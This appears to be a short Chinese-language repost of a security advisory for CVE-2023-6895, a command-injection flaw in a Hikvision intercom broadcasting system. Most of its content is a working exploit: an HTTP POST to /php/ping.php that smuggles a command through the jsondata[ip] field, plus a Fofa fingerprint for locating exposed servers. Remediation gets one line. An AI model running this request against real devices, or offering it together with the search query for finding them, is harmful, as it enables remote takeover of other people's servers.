0x01 前言
海康威视Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,攻击者能够利用该漏洞获取服务器权限,导致服务器沦陷。
0x02 漏洞影响
0x03 漏洞利用
0x04 修复方案
0x05 指纹
影响版本
海康威视IP网络对讲广播系统 v3.0.3_20201113_RELEASE
登录界面
EXP如下:
POST /php/ping.php HTTP/1.1
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping 8.8.8.8
success!
请升级最新版本。
Fofa:icon_hash="-1830859634"
原文始发于微信公众号(阿无安全):CVE-2023-6895 RCE漏洞(附EXP)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论